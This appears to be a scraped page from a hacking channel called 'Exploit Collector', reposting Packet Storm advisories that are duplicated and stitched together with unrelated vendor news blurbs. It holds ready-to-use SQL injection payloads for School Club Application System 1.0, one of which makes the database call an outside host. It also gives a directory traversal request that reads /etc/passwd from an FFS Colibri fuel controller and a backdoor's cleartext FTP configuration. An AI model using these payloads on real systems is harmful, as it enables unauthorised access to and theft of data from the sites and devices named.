Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
School Club Application System 1.0 SQL Injection
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
School Club Application System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
School Club Application System 1.0 SQL Injection
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
School Club Application System version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
95a266a01a9dd252a3a9612f94c0b064Download
## Title: School Club Application System v1.0 SQLi
## Author: nu11secur1ty
## Date: 04.07.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application
## Description:
The `id` parameter appears to be vulnerable to three types of SQL
injection attacks.
The payload '+(select
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'
was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take administrator account control and also of all
accounts on this system, also the malicious user can download all
information about this system.
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: page=clubs/view_details&id=2'+(select
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''
OR NOT 2914=2914-- erOW
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: page=clubs/view_details&id=2'+(select
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''
OR (SELECT 2308 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT
(ELT(2308=2308,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VAfL
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=clubs/view_details&id=2'+(select
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''
AND (SELECT 8537 FROM (SELECT(SLEEP(5)))TWcu)-- jivn
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: page=clubs/view_details&id=2'+(select
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''
UNION ALL SELECT
CONCAT(0x7176787a71,0x7468764e617048694a74717a4f53734a6956786e7a4a56774b48427a7645474c414847756f704641,0x717a6b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
-
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application)
## Proof and Exploit:
[href](https://streamable.com/lpwxr4)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
School Club Application System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
FFS Colibri Controller Module 1.8.19.8580 Directory Traversal
https://3.bp.blogspot.com/-S3Qyj_CQLZk/WWlvO05KSCI/AAAAAAAAIM0/1UOPsv562Y4pHjCru7b9m-kScCR1bHauwCLcBGAs/s1600/h27.png
FFS Colibri Controller Module version 1.8.19.8580 suffers from a directory traversal vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
FFS Colibri Controller Module 1.8.19.8580 Directory Traversal
https://3.bp.blogspot.com/-S3Qyj_CQLZk/WWlvO05KSCI/AAAAAAAAIM0/1UOPsv562Y4pHjCru7b9m-kScCR1bHauwCLcBGAs/s1600/h27.png
FFS Colibri Controller Module version 1.8.19.8580 suffers from a directory traversal vulnerability.
MD5 |
b55ff2cb819f63044265ad485594f0bfDownload
==============[ Author ]==============
= Name: Momen Eldawakhly (Cyber Guy)
= Company: Cypro.se
======================================
==============[ Product ]==============
= Vendor: Franklin Fueling Systems
= Product: FFS Colibri Controller Module
= Version: 1.8.19.8580
======================================
============[ HTTP Exploitation ]============
GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
Upgrade-Insecure-Requests: 1
============[ URL Exploitation ]============
http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
FFS Colibri Controller Module 1.8.19.8580 Directory Traversal
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Ptakks.XP.a Insecure Credential Storage
https://2.bp.blogspot.com/-B3So14l5bG8/WWlvkmPjF3I/AAAAAAAAIQ0/aTmhBdvFPYoCVmoynJbIAB0ZJhP5LcNMQCLcBGAs/s1600/h97.png
Backdoor.Win32.Ptakks.XP.a malware suffers from an insecure credential storage vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Ptakks.XP.a Insecure Credential Storage
https://2.bp.blogspot.com/-B3So14l5bG8/WWlvkmPjF3I/AAAAAAAAIQ0/aTmhBdvFPYoCVmoynJbIAB0ZJhP5LcNMQCLcBGAs/s1600/h97.png
Backdoor.Win32.Ptakks.XP.a malware suffers from an insecure credential storage vulnerability.
MD5 |
6489f9042880642261d27ecd4fca15c9Download
Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/e087725b01dded75d85a20db58335fa8.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Ptakks.XP.a
Vulnerability: Insecure Credential Storage
Description: The default password for the backdoor FTP is stored in cleartext within the ptakks.ini file.
Family: Ptakks
Type: PE32
MD5: e087725b01dded75d85a20db58335fa8
Vuln ID: MVID-2022-0537
Disclosure: 04/06/2022
Exploit/PoC:
"ptakks.ini"
[FTP]
servidor=192.168.18.125
puerto=21
usuario=usuario
password=password
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Ptakks.XP.a Insecure Credential Storage
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Backdoor.Win32.Xingdoor Denial Of Service
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Xingdoor Denial Of Service
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Xingdoor Denial Of Service
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
BeyondTrust Announces CEO Transition
Janine Seebeck promoted to CEO and Matt Dircks appointed executive board chair, effective July 1.
___________________________
@hacking_Attack
@Hacking_Video
BeyondTrust Announces CEO Transition
Janine Seebeck promoted to CEO and Matt Dircks appointed executive board chair, effective July 1.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
BeyondTrust Announces CEO Transition
Janine Seebeck promoted to CEO and Matt Dircks appointed executive board chair, effective July 1.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Blumira Unveils Cloud SIEM With Integrated Detection and Response for SMBs
Self-service cloud SIEM comes in free and paid editions.
___________________________
@hacking_Attack
@Hacking_Video
Blumira Unveils Cloud SIEM With Integrated Detection and Response for SMBs
Self-service cloud SIEM comes in free and paid editions.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Blumira Unveils Cloud SIEM With Integrated Detection and Response for SMBs
Self-service cloud SIEM comes in free and paid editions.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Keysight Delivers Zero Trust Test Solution
Enables network equipment manufacturers to validate devices in distributed cloud networks.
___________________________
@hacking_Attack
@Hacking_Video
Keysight Delivers Zero Trust Test Solution
Enables network equipment manufacturers to validate devices in distributed cloud networks.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Keysight Delivers Zero Trust Test Solution
Enables network equipment manufacturers to validate devices in distributed cloud networks.